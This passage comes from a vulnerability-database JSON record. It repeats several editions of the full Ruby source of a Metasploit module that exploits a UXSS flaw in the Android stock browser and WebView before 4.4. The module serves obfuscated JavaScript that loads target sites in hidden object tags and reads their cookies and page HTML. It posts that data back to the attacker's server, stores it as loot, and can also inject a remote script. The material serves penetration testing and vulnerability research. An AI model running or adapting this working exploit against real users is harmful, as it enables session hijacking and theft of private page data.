'#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-10-27T01:39:40", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-19T04:01:20", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-19T04:01:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-19T04:01:20", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-19T06:02:43", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-19T06:02:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-19T06:02:43", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T06:02:24", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-20T06:02:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-20T06:02:24", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T08:01:52", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-01-20T08:01:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-20T08:01:52", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-26T08:57:12", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-02-26T08:57:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-02-26T08:57:12", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-26T10:53:29", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-02-26T10:53:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 